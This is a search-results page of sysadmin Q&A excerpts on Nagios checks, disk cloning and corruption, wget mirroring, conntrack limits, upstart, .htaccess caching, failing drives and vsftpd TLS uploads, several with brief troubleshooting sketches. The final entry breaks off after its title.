Search Results

Search found 15743 results on 630 pages for 'js is bad'.


  • Nagios returns "No output returned from plugin" for a running-process check

    - by user56291
    I have a Nagios server and a bunch of Nagios clients that I currently monitor. All the clients are set up with the following NRPE configuration. The check_users, check_load... metrics are successfully displayed on the Nagios interface, but check_nginx and check_server_proxy are displayed as "Unknown" (No output returned from plugin). As far as I understood, Nagios simply runs the ps command and looks for either the argument strings or the name of the command to verify whether the service is running. Also, with the -c flag one can give Nagios a threshold to determine the output (i.e. -c 1 returns 'OK' if it finds at least one process).

    nrpe_local.cfg:

        ######################################
        # Do any local nrpe configuration here
        ######################################
        allowed_hosts=127.0.0.1,10.0.2.181
        command[check_users]=/usr/lib/nagios/plugins/check_users -w 5 -c 10
        command[check_load]=/usr/lib/nagios/plugins/check_load -w 15,10,5 -c 30,25,20
        command[check_all_disks]=/usr/lib/nagios/plugins/check_disk -w 20% -c 10%
        command[check_zombie_procs]=/usr/lib/nagios/plugins/check_procs -w 5 -c 10 -s Z
        command[check_total_procs]=/usr/lib/nagios/plugins/check_procs -w 150 -c 200
        command[check_swap]=/usr/lib/nagios/plugins/check_swap -w 50% -c 25%
        command[check_server_proxy]=/usr/lib/nagios/plugins/check_procs -c 1 -a "api-v1/server.js"
        command[check_nginx]=/usr/lib/nagios/plugins/check_procs -c 1:30 -C nginx

    nagios_server.cfg:

        ...
        define host{
            use           generic-host    ; Name of host template to use
            host_name     plum
            alias         plum
            address       10.0.2.88
            check_command check-host-alive-by-ssh
        }
        ...
        # Check api-proxy-server
        define service{
            use                 generic-service
            host_name           plum
            service_description check api proxy service
            check_command       check_nrpe!check_server_proxy
        }
        define service{
            use                   generic-service ; Name of service template to use
            host_name             plum
            service_description   CHECK_NGINX
            check_period          24x7
            max_check_attempts    3
            normal_check_interval 5
            retry_check_interval  3
            check_command         check_nrpe!check_nginx
            notifications_enabled 1
        }

    Also, when I run the command on the Nagios client:

        /usr/lib/nagios/plugins/check_procs -c 1 -a "api-v1/server.js"

    I get the desired output: PROCS OK: 1 process with args 'api-v1/server.js'. I would really appreciate any pointers that might help me figure out why the nrpe command does not return the desired output on the Nagios server panel.
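
    A quick way to see which side is losing the output (a sketch; the plugin path and the client address are taken from the question's own config) is to invoke the NRPE command from the Nagios server rather than locally on the client:

        # run on the Nagios server; 10.0.2.88 is the client "plum"
        /usr/lib/nagios/plugins/check_nrpe -H 10.0.2.88 -c check_server_proxy

    If this prints the same PROCS OK line, the NRPE channel is fine and the problem is in the service definition; if it returns nothing, look at the client-side command definition and at what the nrpe user actually sees when it runs ps.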

    Read the article

  • Network monitoring tools with API features

    - by Kev
    We use KS-Soft's Advanced Host Monitor package to monitor around 2000 items on our network. We think it's great, the chap that supports it is fantastic, and the product is fast, stable and mature, but I feel that as we grow as a company it's beginning to show some friction points in the area of integration with our back-office admin systems. One of the things we'd like to do is be able to add new tests to whatever monitoring tool we use via an API. For example, when orders for servers come from our retail interface, the server gets built automatically, and as part of the automated build process we'd like to automatically add new tests to the network monitoring systems. HostMonitor has some support for this via a feature called HM Script, but we're starting to encounter some speed bumps:

        we can't add new operators/users
        we can't define new "Action Profiles" - these are the actions to be taken when a test goes good or bad

    What we love about HostMonitor, though, are the Action Profiles. For example, if a Windows IIS box goes bad, our action profile for a bad test does something like:

        Check host again (one time)
        Wait another 30 seconds, then test again
        Try restarting the app pool on the remote machine (up to two times)
        Send an email to ops about the restart failure
        Try restarting IIS on the remote machine (up to four times)
        Page duty admin (up to 5 times - stops after duty admin ACKs the alert)
        Page backup duty admin (5 times - stops after backup duty admin ACKs the alert)

    I'm starting to look around at other network monitoring tools, and I'm looking for:

        a comprehensive API to add/remove/control tests, test "action profiles" and operators (not just plugins; we need control and admin interfaces)
        the ability to have quite detailed action/escalation profiles (and to define these via an API)

    I've looked at Nagios and Icinga, but I can't seem to glean from their documentation whether we could have these features or, if we could, how much work would be involved to implement/customise them. Can anyone provide any advice, guidance or experiences?

    Read the article

  • I used disk copy to clone my drive, now my windows 7 profile won't load correctly

    - by RzK
    I used EaseUS Disk Copy, after Acronis, Clonezilla and Windows image restore failed me. Basically it copies all sectors; I set it to skip bad sectors (40). The source drive works, it just gave me a couple of errors and stopped booting at one point. The new drive is an identical copy, minus the 40 bad sectors. The drive is set to C and is the active partition, and I rebuilt the boot order. I've run sfc /scannow and chkdsk /r; chkdsk found 20 KB of bad sectors, if I remember right. Now the issue: when I log into my profile, which was saved correctly, I get a blank light-blue wallpaper (the non-licensed look), explorer.exe is not running, and there are only 4 processes in Task Manager, including Task Manager itself. I would try a repair install, but Ctrl-E will not open anything, and nothing will open even once I force-start explorer.exe - almost as if all services are down. What should I do? A fresh install is almost not an option; I want to fix this issue. sfc /scannow /offbootdir=c:\ /offwindir=c:\windows returns "Windows Resource Protection could not perform the requested operation".

    Read the article

  • WGet or cURL: Mirror Site from http://site.com And No Internal Access

    - by alharaka
    I have tried wget -m, wget -r, and a whole bunch of variations. I am getting some of the images on http://site.com, one of the scripts, and none of the CSS, even with the fscking -p parameter. The only HTML page is index.html, and there are several more referenced, so I am at a loss. curlmirror.pl on the cURL developers' website does not seem to get the job done either. Is there something I am missing? I have tried different levels of recursion with only this URL, but I get the feeling I am missing something. Long story short, some school allows its students to submit web projects, but they want to know how they can collect everything for the instructor who will grade it, instead of him going to all the externally hosted sites. UPDATE: I think I figured out the issue. I thought the links to the other pages were in the index.html page that downloaded. I was way off. Turns out the footer of the page, which has all the navigation links, is handled by a JavaScript file, Include.js, which reads JLSSiteMap.js and some other JS files to do page navigation and the like. As a result, wget does not pick up the other dependencies, because a lot of this crap is not handled in the web pages themselves. How can I handle such a website? This is one of several problem cases. I assume little can be done if wget cannot parse JavaScript.
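
    For reference, a typical "grab everything" invocation looks like the sketch below (standard wget options; site.com as in the question). It still won't follow links that exist only inside JavaScript, so the JS-driven navigation has to be worked around by feeding wget an explicit URL list:

        # mirror + page requisites + rewrite links + sane file extensions
        wget -m -p -k -E http://site.com
        # urls.txt is a hypothetical hand-made list of page URLs
        # extracted from JLSSiteMap.js and friends
        wget -p -k -E -i urls.txt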

    Read the article

  • nf_conntrack complaints in dmesg

    - by Alexander Gladysh
    While investigating complaints about bad HTTP server performance, I discovered these lines in the dmesg of my Xen XCP host, which contains a guest OS with said server:

        [11458852.811070] net_ratelimit: 321 callbacks suppressed
        [11458852.811075] nf_conntrack: table full, dropping packet.
        [11458852.819957] nf_conntrack: table full, dropping packet.
        [11458852.821083] nf_conntrack: table full, dropping packet.
        [11458852.822195] nf_conntrack: table full, dropping packet.
        [11458852.824987] nf_conntrack: table full, dropping packet.
        [11458852.825298] nf_conntrack: table full, dropping packet.
        [11458852.825891] nf_conntrack: table full, dropping packet.
        [11458852.826225] nf_conntrack: table full, dropping packet.
        [11458852.826234] nf_conntrack: table full, dropping packet.
        [11458852.826814] nf_conntrack: table full, dropping packet.

    The complaints are repeated every five seconds (the number of suppressed callbacks is different each time). What can these symptoms mean? Is it bad? Any hints? (Note that the question is narrower than "how to solve a specific case of bad HTTP server performance", so I am not giving more details on that.) Additional info:

        $ uname -a
        Linux MYHOST 3.2.0-24-generic #37-Ubuntu SMP Wed Apr 25 08:43:22 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
        $ lsb_release -a
        No LSB modules are available.
        Distributor ID: Ubuntu
        Description:    Ubuntu 12.04 LTS
        Release:        12.04
        Codename:       precise
        $ cat /proc/sys/net/netfilter/nf_conntrack_max
        1548576

    The server is under a load of about 10M hits/day.
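
    To confirm the diagnosis (a sketch; these are the standard netfilter sysctl paths), compare the live count against the ceiling on the box that actually logs the message - on a Xen host that is the dom0, not the guest:

        cat /proc/sys/net/netfilter/nf_conntrack_count   # connections tracked right now
        cat /proc/sys/net/netfilter/nf_conntrack_max     # the ceiling being hit
        # if the ceiling is raised, the hash table usually needs growing too
        cat /sys/module/nf_conntrack/parameters/hashsize

    If the count sits near the max, something is holding huge numbers of tracked connections open; if it doesn't, the messages are coming from a different network namespace or host than the one being checked.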

    Read the article

  • ext4 filesystem corruption -- maybe hardware error?

    - by pts
    I'm getting these errors in dmesg about half an hour after I turn on the computer:

        [ 1355.677957] EXT4-fs error (device sda2): htree_dirblock_to_tree: inode #1318420: (comm updatedb.mlocat) bad entry in directory: directory entry across blocks - block=5251700offset=0(0), inode=1802725748, rec_len=179136, name_len=32
        [ 1355.677973] Aborting journal on device sda2-8.
        [ 1355.678101] EXT4-fs (sda2): Remounting filesystem read-only
        [ 1355.690144] EXT4-fs error (device sda2): htree_dirblock_to_tree: inode #1318416: (comm updatedb.mlocat) bad entry in directory: directory entry across blocks - block=5251699offset=0(0), inode=2194783952, rec_len=53280, name_len=152
        [ 1356.864720] EXT4-fs error (device sda2): htree_dirblock_to_tree: inode #1312795: (comm updatedb.mlocat) bad entry in directory: directory entry across blocks - block=5251176offset=1460(13748), inode=1432317541, rec_len=208208, name_len=119

    /dev/sda is an SSD, and it's using the noop scheduler. /etc/fstab entry:

        UUID=acb4eefa-48ff-4ee1-bb5f-2dccce7d011f / ext4 errors=remount-ro,noatime,discard,user_xattr 0 1

    System information:

        $ cat /proc/mounts | grep /dev/sd
        /dev/sda1 /boot ext2 rw,noatime,errors=continue 0 0
        $ cat /etc/lsb-release
        DISTRIB_ID=Ubuntu
        DISTRIB_RELEASE=10.04
        DISTRIB_CODENAME=lucid
        DISTRIB_DESCRIPTION="Ubuntu 10.04.3 LTS"
        $ uname -a
        Linux leetpad 2.6.35-30-generic-pae #61~lucid1-Ubuntu SMP Thu Oct 13 21:14:29 UTC 2011 i686 GNU/Linux

    I've run memtest for 7 hours; it didn't find any memory errors. Any obvious ideas about what could be going wrong here? The most reasonable thing I can imagine is that the SSD is silently dropping some write requests, which eventually leads to an ext4 filesystem inconsistency (but no disk I/O errors). How can this happen? Is there a relevant configuration option I should make sure is set correctly? What tools should I use to diagnose the hardware failure? Would it be possible to diagnose the SSD failure without overwriting data?
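
    For the hardware-diagnosis part, smartmontools is the usual first stop (a sketch; the device name is taken from the question, and the package may need installing):

        smartctl -a /dev/sda           # SMART attributes and the drive's own error log
        smartctl -t long /dev/sda      # start a long self-test...
        smartctl -l selftest /dev/sda  # ...and read its result once it finishes

    These are read-only with respect to your data, so they satisfy the "without overwriting data" requirement; look for reallocated/pending sector counts and entries in the error log.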

    Read the article

  • Two instances of Windows Vista on boot up after failed clean install

    - by Dwayne
    I tried to install a clean version of Vista but failed. I ended up with Windows and Windows.old on my C: drive and a dual-boot option at boot-up. I gave up, booted the old version, and tried to rename Windows.old to Windows; I was asked if I wanted to merge the two folders. I answered yes, and all seemed OK until I booted up this morning and was given a choice of two versions of Vista: the first is the one that failed to install correctly, and the second is the old version. How can I get rid of the failed installation? I got rid of the bad boot entry via MSCONFIG. Here is my current situation: I have several hard drives installed, I'm using C: as my boot drive, and a much larger drive (H:) stores most of my files. I found a subfolder named windows inside my C:\windows folder. Upon inspection I determined it to be older than the C:\windows folder, so it must be the older, working version of the installation. I renamed the C:\windows folder to C:\windows.bad and moved the nested windows folder to the C: root directory. I also copied it to the H: drive. Now MSCONFIG reports that the copy that is booting is the H: copy. How can I change it back to the C: copy, and can I delete the C:\windows.bad file set?
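
    On Vista the boot menu lives in the BCD store, so the stale entry can also be inspected and removed from an elevated command prompt (a sketch; the GUID is a placeholder you read out of the /enum listing):

        rem back up the store first
        bcdedit /export C:\bcdbackup.bcd
        rem list all boot entries with their GUIDs and device/osdevice paths
        bcdedit /enum
        rem delete the entry pointing at the wrong windows folder
        bcdedit /delete {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}

    The device/osdevice fields in the /enum output also answer which partition each menu entry actually boots from, which MSCONFIG only shows indirectly.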

    Read the article

  • Mac OS X printing to CUPS - More intuitive authentication failure?

    - by Moduspwnens
    We have a network-wide CUPS server that offers authenticated printer access to all our campus users. We've been pretty disappointed with the way Mac clients handle failed printing authentication, though. In any other authentication dialog, when a user types in a bad username or password, the window shakes briefly, allowing the user to re-enter. With printers, this isn't the case: the dialog happily accepts (and even saves to the keychain, if specified) bad credentials. The authentication dialog is dismissed, and the user then has to deal with print jobs showing up as "On hold (authentication required)". To get the job printed, they need to select it in the printer's queue, click "Resume", then re-enter appropriate credentials. Is there a way to make failed printing authentication behave more intuitively for Mac OS X clients? We're trying to support a BYOD environment, but our end users have been really confused by this. It's made even worse by the way the dialog pre-populates the user's full login name (e.g. "Smith, John"), which tends to make them think they should use their local machine passwords.

    Read the article

  • Is something infecting my Google searches?

    - by hippietrail
    I started doing some experimentation toward making a browser userscript for Google searches, and when opening the JavaScript console I noticed something that strikes me as very fishy:

        The page at https://www.google.com.au/search?oq=XYZ&sourceid=chrome&ie=UTF-8&q=XYZ displayed insecure content from http://50.116.62.47/js/chromeServerV45.js.
        The page at about:blank displayed insecure content from http://96.126.107.154/amz/google.php?callback=a&q=XYZ&country=US.

    (XYZ is a placeholder for whatever the search term really was.) Is it likely that I've picked up something like a drive-by browser infection? I've tried all kinds of searches for these URLs and other keywords, but I've had no luck finding anything conclusive about whether they're malicious or what they are:

        50.116.62.47
        chromeServerV45.js
        96.126.107.154
        amz/google.php

    The only extensions I have installed are either widely used or written by myself. But something else is strange, and I'm not sure if it's just a coincidence: I updated my Windows Chrome browser today to version 23.0.1271.64 m, and now my Extensions tab as well as my Settings tab are blank, so I can't try disabling my extensions. Here's some discussion I've been able to find so far but not really been able to make sense of: for 96.126.107.154: "anomalous-javascript-pt2"

    Read the article

  • Is it possible to mount a disk image, created with dd, to a directory on a mounted external usb hdd?

    - by Keeper Hood
    I have an image of my /home (/dev/sda3) partition, which I created using the dd command:

        dd if=/dev/sda3 of=/path/to/disk.img

    I deleted the home partition via GParted in order to enlarge my root partition, then recreated the /dev/sda3 partition, which is smaller than the one I backed up to the image. I was wondering, since I have a 2 TB external HDD, could it be possible to mount my backed-up image from the external HDD and then copy the files into the /home directory? Since the external HDD would already be in a mounted state, I'm unsure whether mounting something on an already-mounted device is a good idea. I'm running Slackware 13.37 (64-bit), using ext4 on all the partitions; I resized the root partition with the GParted live CD. I've tried:

        mount -t ext4 /path/to/disk.img /mnt/image -o loop

    It gave me an fs error (wrong fs type, bad option, bad superblock on /dev/loop0). Then I did dmesg | tail, which outputs:

        EXT4-fs (loop0): bad geometry: block count 29009610 exceeds size of device (1679229 blocks)

    I have no idea what to do; I want to restore my /home data from the image I backed up.
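
    That dmesg line means the filesystem inside the image claims far more blocks than the image file actually contains, i.e. the image looks truncated (assuming 4 KB blocks, 29009610 blocks is roughly 110 GB, while the loop device only offers about 6.4 GB). A quick way to verify, as a sketch using standard e2fsprogs:

        # what the filesystem metadata inside the image claims
        dumpe2fs -h /path/to/disk.img | grep -i 'block count\|block size'
        # what the image file actually holds, in bytes
        ls -l /path/to/disk.img

    If the file is smaller than block count x block size, the dd never captured the whole partition, and mounting it anywhere will fail the same way.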

    Read the article

  • Windows Media Based video audio converter?

    - by acidzombie24
    This may seem like an odd question. Right now only Windows Media Player, VLC and Media Player Classic open and play my audio/video correctly. VirtualDub plays it back with the wrong framerate and loses the audio; Avidemux 2.5 seems to be able to dump the audio/video, but the video (as in all other apps) either has a bad framerate or is otherwise wrong (glitches, bad framerate, or a bad dump). Nothing recognizes the audio file, and when playing the video, Avidemux (and most other things) dies. FFmpeg can't seem to split out the video or audio (using stream copy, -an and the like), and this is getting me very angry. VLC also dumps the video incorrectly when I try dumping it with that. What can I use to convert the video? It's a stream recording, so it starts at 26 minutes in and ends at 28 - this is where apps have the problem: they don't know this, and fudge everything or crash. I managed to dump the audio with Avidemux, but VirtualDub and FFmpeg say "unrecognized codec". Even if I can't convert it (it seems compressed enough), I want to at least attach the audio back into an AVI.
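
    If the goal is just to re-wrap the streams without touching them, a stream-copy remux is worth one more try (a sketch; input.wmv is a placeholder name, and whether it works depends on how damaged the container timestamps are):

        # copy both streams into an AVI container without re-encoding
        ffmpeg -i input.wmv -vcodec copy -acodec copy output.avi

    Because -vcodec copy/-acodec copy skip decoding entirely, the framerate handling of the decoders is bypassed; if FFmpeg still refuses, the container index itself is probably broken.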

    Read the article

  • How long will a USB key with an OS installed on it last?

    - by Xananax
    I've heard numerous times that installing an OS on a USB key is a bad thing to do, as USB keys typically survive only a certain number of writes before dying, and installing an OS on one will wear it out (unless it's used sporadically for rescue purposes). Nonetheless, I am very tempted to install some flavour of Linux (Ubuntu or Arch, I haven't decided yet) on a small, transportable USB key. My problem is, although you read a lot that it's "bad", you are never told how bad. How long would it last (provided, say, a PC that is on 24/7)? A month? A year? Five years? Are there recipes to make it last longer? Is there any reason besides wear that should prevent me from attempting this? I mean, if it can be calculated, then I could theoretically shield myself by doing regular backups onto another key when the deadline gets close (for example). Notes: I am not talking about using a USB key as a live CD, but actually installing the OS on it. When I say "USB key", I mean the little sticks with flash memory, not an external USB hard drive. For the curious, my reason is that I work in a lot of different places, on different PCs, and I have a very customized session, with my own WM, my own key bindings, my own scripts, a selection of plugins for Firefox and Chrome, etc., and currently I am synchronizing all this through a mix of Dropbox, git, and transporting files on USB keys, and it's becoming a chore. It would be much simpler for me to just plug in the USB key, mount the hard disk of the PC I am using, and use its processing power without actually needing to install any OS on it.
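
    As for recipes to make it last longer: most of the wear comes from small, frequent writes, so the usual trick is to keep those off the stick. A sketch of /etc/fstab entries (the device name and the choice of directories are assumptions to adapt):

        # mount the root fs without access-time writes, with batched commits
        /dev/sdb1   /         ext4    noatime,commit=60   0   1
        # keep the chattiest directories in RAM instead of on flash
        tmpfs       /tmp      tmpfs   defaults,noatime    0   0
        tmpfs       /var/log  tmpfs   defaults,noatime    0   0

    noatime alone removes a metadata write for every file read, which on a flash stick is a large share of the traffic; the cost of the tmpfs lines is that logs vanish on reboot.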

    Read the article

  • How can I track down the cause of ext3 filesystem corruption?

    - by Jon Buys
    We have a VMware vSphere 5 environment running CentOS 5.8 virtual machines. In the past two weeks we have had five incidents of virtual machines having a filesystem become corrupt, requiring an fsck to repair. Here is what we see in the logs:

        Nov 14 14:39:28 hostname kernel: EXT3-fs error (device dm-2): htree_dirblock_to_tree: bad entry in directory #2392098: rec_len is smaller than minimal - offset=0, inode=0, rec_len=0, name_len=0
        Nov 14 14:39:28 hostname kernel: Aborting journal on device dm-2.
        Nov 14 14:39:28 hostname kernel: __journal_remove_journal_head: freeing b_committed_data
        Nov 14 14:39:28 hostname last message repeated 4 times
        Nov 14 14:39:28 hostname kernel: ext3_abort called.
        Nov 14 14:39:28 hostname kernel: EXT3-fs error (device dm-2): ext3_journal_start_sb: Detected aborted journal
        Nov 14 14:39:28 hostname kernel: Remounting filesystem read-only
        Nov 14 14:39:28 hostname kernel: EXT3-fs error (device dm-2): htree_dirblock_to_tree: bad entry in directory #2392099: rec_len is smaller than minimal - offset=0, inode=0, rec_len=0, name_len=0
        Nov 14 14:31:17 hostname ntpd[3041]: synchronized to 194.238.48.2, stratum 2
        Nov 14 15:00:40 hostname kernel: EXT3-fs error (device dm-2): htree_dirblock_to_tree: bad entry in directory #2162743: rec_len is smaller than minimal - offset=0, inode=0, rec_len=0, name_len=0
        Nov 14 15:13:17 hostname kernel: __journal_remove_journal_head: freeing b_committed_data

    The problem seems to happen while we are rsyncing application data from another server. So far we have been unable to reproduce the problem or identify a root cause. After a few servers had this problem, we assumed there was an issue with the template, so we scrapped all VMs cloned from the template, destroyed the template, and built a new template from scratch, installed from a newly downloaded CentOS ISO. We use HP EVA SANs for datastores, and moved from a 4400 to a 6300 after the first problem. Since the move and the rebuilding of new virtual machines, we have seen the issue twice. On one VM we shut down the server, removed two virtual CPUs, and booted it back up again; the problem presented itself almost immediately. On the other VM, we rebooted it, and the problem happened half an hour later. Any tips or pointers in the right direction would be appreciated.
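
    When it happens again, it can help to look at the damaged directory before fsck rewrites it (a sketch; the device path is an assumption - map dm-2 to its logical volume with dmsetup ls first):

        # read-only inspection of the directory inode named in the log
        debugfs -R "stat <2392098>" /dev/mapper/VolGroup00-LogVol00

    Whether the directory block is all zeroes or random garbage is a useful clue: zeroed entries (rec_len=0, inode=0, as in these logs) tend to point at lost or torn writes somewhere in the storage path rather than at in-memory corruption.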

    Read the article

  • IIS doesn't serve certain file extensions

    - by Alekc
    Hi, I have a weird issue on a Windows 2003 server with IIS. IIS hosts several sites; in one of them I needed to create a subdirectory and set it up as a web application. I've noticed that if I create a new directory and put some .js/.txt files into it, they are not served by IIS (IE gives the error "Internet Explorer cannot display the webpage"). If I put the same files in another, older site's subdirectory, they show correctly. By sniffing traffic I've seen that IIS replies with status 200 and then drops the connection completely:

        http://domain.com/test2/prova.txt

        GET /test2/prova.txt HTTP/1.1
        Host: domain.com
        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip,deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Keep-Alive: 300
        Connection: keep-alive

        HTTP/1.x 200 OK

    If I rename prova.txt to prova.asp, for example, it shows without problems, so it shouldn't be a permissions issue. After some research I found that this can be caused by missing MIME types, but I've checked, and .txt and .js are present and served by aspnet_isapi.dll. And here comes another weird thing: if I remove the MIME mapping from the directory's properties, the .txt file is served correctly, but the same trick doesn't work for .js. I'm really beginning to run out of ideas; does anyone have a hint? Thanks in advance.

    Read the article

  • Performance-wise .htaccess

    - by purpler
    Here's my .htaccess template; I wonder if anything could be added to increase website performance.

        # Defaults
        AddDefaultCharset UTF-8
        DefaultLanguage en-US
        ServerSignature Off
        FileETag None
        Header unset ETag
        Options -MultiViews
        #Options All -Indexes

        # Force the latest IE version or ChromeFrame
        <IfModule mod_setenvif.c>
          <IfModule mod_headers.c>
            BrowserMatch MSIE ie
            Header set X-UA-Compatible "IE=Edge,chrome=1" env=ie
          </IfModule>
        </IfModule>

        # Proxy X-UA Setup
        <IfModule mod_headers.c>
          Header append Vary User-Agent
        </IfModule>

        # Rewrites
        Options +FollowSymlinks
        RewriteEngine On
        RewriteBase /

        # Redirect to non-WWW
        RewriteCond %{HTTPS} !=on
        RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC]
        RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

        # Redirect to WWW
        RewriteCond %{HTTP_HOST} ^domain.com
        RewriteRule (.*) http://www.domain.com/$1 [R=301,L]

        # Redirect index to root
        RewriteRule ^(.*)index\.(php|html)$ /$1 [R=301,L]

        # Caching
        ExpiresActive On
        ExpiresDefault A0
        Header set Cache-Control "public"

        # 1 Year Long Cache
        <FilesMatch "\.(flv|fla|ico|pdf|avi|mov|ppt|doc|mp3|wmv|wav|png|jpg|jpeg|gif|swf|js|css|ttf|eot|woff|svg|svgz)$">
          ExpiresDefault A31622400
        </FilesMatch>

        # Proxy Caching
        <FilesMatch "\.(css|js|png)$">
          ExpiresDefault A31622400
          Header set Cache-Control "private"
        </FilesMatch>

        # Protect against DOS attacks by limiting file upload size
        LimitRequestBody 10240000

        # Proper SVG serving
        AddType image/svg+xml svg svgz
        AddEncoding gzip svgz

        # GZip Compression
        <IfModule mod_deflate.c>
          <FilesMatch "\.(php|html|css|js|xml|txt|ttf|otf|eot|svg)$">
            SetOutputFilter DEFLATE
          </FilesMatch>
        </IfModule>

        # Error page
        ErrorDocument 404 /404.html

        # Deny access to sensitive files
        <FilesMatch "\.(htaccess|ini|log|psd)$">
          Order Allow,Deny
          Deny from all
        </FilesMatch>
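
    One thing worth noting in the template: the "Proxy Caching" block overrides Cache-Control to "private" for css/js/png, which stops shared proxies from caching exactly the files the long-cache block tries to push out. A per-MIME-type approach with mod_expires avoids the overlapping FilesMatch blocks entirely (a sketch):

        # instead of overlapping FilesMatch blocks, expire by content type
        ExpiresActive On
        ExpiresByType image/png                "access plus 1 year"
        ExpiresByType text/css                 "access plus 1 year"
        ExpiresByType application/x-javascript "access plus 1 year"

    With ExpiresByType, each response gets exactly one expiry rule, so there is no later directive silently undoing an earlier one.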

    Read the article

  • Formatting an external HDD stuck at 70%

    - by mahmood
    My external HDD, a 250 GB USB-powered WD, seems to have a problem! Whenever I try to copy some files, it gets stuck while copying. I decided to format it, so I used the Windows tool and performed a (non-quick) format; however, at nearly 70% it got stuck. Then I tried a low-level format with lowlevel; again it got stuck at 70%. I've concluded that the HDD has bad sectors. So, is there a tool that marks the bad sectors and bypasses them? It is not very reasonable to throw away 250 GB because of some bad sectors! P.S.: I saw a similar topic, but there was no conclusion there either. The SMART data is:

        Attribute                               Raw value  Value  Threshold  Status
        Read Error Rate                         50         200    51         OK
        Spin-Up Time                            3275       154    21         OK
        Start/Stop Count                        2729       98     0          OK
        Reallocated Sectors Count               0          200    140        OK
        Seek Error Rate                         0          100    51         OK
        Power-On Hours (POH)                    1057       99     0          OK
        Spin Retry Count                        0          100    51         OK
        Recalibration Retries                   0          100    51         OK
        Power Cycle Count                       1385       99     0          OK
        Power-off Retract Count                 425        200    0          OK
        Load/Unload Cycle Count                 12974      196    0          OK
        Temperature                             43         43     0          OK
        Reallocation Event Count                0          200    0          OK
        Current Pending Sector Count            23         200    0          Degradation
        Uncorrectable Sector Count              0          100    0          OK
        UltraDMA CRC Error Count                6          200    0          OK
        Write Error Rate/Multi-Zone Error Rate  0          100    51         OK

    It seems the most important line is: Current Pending Sector Count, 23, 200, 0, Degradation. Any ideas on that?
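
    Tools that "mark" bad sectors work at the filesystem level, so the usual route on Windows, once a format succeeds, is to let chkdsk map the damage out (a sketch; X: is a placeholder drive letter):

        rem scan the external drive and map out bad clusters
        chkdsk X: /r

    On Linux, the equivalent is a destructive badblocks -wsv scan of the partition followed by mkfs with the resulting bad-block list. Be aware, though, that a nonzero and growing Current Pending Sector Count usually means the drive is actively failing; mapping sectors out tends to buy time rather than fix it.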

    Read the article

  • Upstart: cannot run as root

    - by Ronni Egeriis
    I have made this upstart script, which starts a Node.js service. But all of a sudden the service stopped, and upstart failed to restart it. Now that I am trying to start it manually, it fails to recognize my service:

        start: Unknown job: queue

    The script is properly placed in /etc/init and should have the correct rights:

        -rw-r--r-- 1 root root 200 Aug 7 13:30 queue.conf

    When I check the config file with init-checkconf, however, it says that it is not able to run as root:

        root@production1:~# init-checkconf /etc/init/queue.conf
        ERROR: cannot run as root

    What causes this error and how do I solve it? Debug info:

        Ubuntu 12.04.3 LTS
        root@production1:~# service --version
        service ver. 0.91-ubuntu1

    Edit: Here's queue.conf:

        description "Echo.it command queue"
        author "Ronni Egeriis Persson <[email protected]>"

        stop on shutdown

        respawn
        respawn 20 5

        exec sudo -u beanstalk /usr/bin/node /var/www/queue/index.js >> /var/log/queue.log 2>&1

    The command sudo -u beanstalk /usr/bin/node /var/www/queue/index.js >> /var/log/queue.log 2>&1 works fine when run manually.
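
    Two things are worth checking here. First, init-checkconf refuses to run as root by design (it spins up a test Upstart session), so the error is about the tool, not the job; run it as an unprivileged user. Second, "Unknown job" usually means the .conf failed to parse at all, and the respawn limit stanza is spelled "respawn limit COUNT INTERVAL" - so if the file really contains a bare "respawn 20 5" line as quoted above, that alone could make the job unloadable. A sketch ("someuser" is a placeholder account):

        # validate the job as a normal user
        sudo -u someuser init-checkconf /etc/init/queue.conf
        # then make upstart re-read the job directory
        initctl reload-configuration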

    Read the article

  • VSFTPD - FTP over TLS - Upload stops after exactly 82k?

    - by Redsandro
    I installed a vsftpd daemon on a CentOS server, using an RSA certificate for logging in over explicit TLS. Now I cannot upload more than 82 KB. With files under that limit there is no problem; the FTP works like a charm. But as soon as a file reaches 82 KB with FileZilla (81,952 bytes to be exact), the transfer stops, and the FTP client hangs until the timeout is reached. FTP client console:

        15:10:21 Command:  STOR jquery-1.7.2.min.js
        15:10:21 Response: 150 Ok to send data.
        15:11:21 Error:    Connection timed out
        15:11:21 Error:    File transfer failed after transferring 82 KB in 60 seconds

    /var/log/vsftpd.log:

        FTP command: Client "x.x.x.x", "STOR jquery-1.7.2.min.js"
        FTP response: Client "x.x.x.x", "150 Ok to send data."
        OK UPLOAD: Client "x.x.x.x", "jquery-1.7.2.min.js", 81952 bytes, 1.32Kbyte/sec
        FTP response: Client "x.x.x.x", "226 File receive OK."   <- NOT okay, the file is bigger; no mention of an error here

    I cannot find relevant info about this problem, apart from a possible problem with trans_chunk_size (not mentioned in the default config), but I tried different sizes and it had no impact on the problem:

        trans_chunk_size=4096
        trans_chunk_size=8192
        trans_chunk_size=9999

    Of course, after every configuration change I restarted the server with /etc/init.d/vsftpd restart. What else can cause this? It's not the latest version, but it's the latest update within the repositories that has been deemed fit for enterprise usage. Package info:

        $ yum info vsftpd
        Loaded plugins: fastestmirror
        Installed Packages
        Name       : vsftpd
        Arch       : x86_64
        Version    : 2.0.5
        Release    : 24.el5_8.1
        Size       : 286 k
        Repo       : installed
        Summary    : vsftpd - Very Secure Ftp Daemon
        URL        : http://vsftpd.beasts.org/
        License    : GPL
        Description: vsftpd is a Very Secure FTP daemon. It was written completely from scratch.
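
    A stall after roughly one TCP window of data is the classic signature of a firewall that can no longer track the data connection once the control channel is encrypted: with explicit TLS, the connection-tracking helper that normally reads the PASV reply is blind, so the data port never gets opened and the sender's buffer fills. A common workaround (a sketch; the port range is arbitrary, and require_ssl_reuse may not exist in a build as old as 2.0.5) is to pin the passive ports and open them explicitly:

        # /etc/vsftpd/vsftpd.conf
        pasv_enable=YES
        pasv_min_port=50000
        pasv_max_port=50100
        # some clients fail mid-transfer when SSL session reuse is enforced
        require_ssl_reuse=NO

    Then allow TCP 50000-50100 through the firewall in front of the server, alongside port 21.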

    Read the article

  • Strange issue! Local network cache with PHP and Apache2 on Win Server 2008 R2

    - by Ahmed Benlahsen
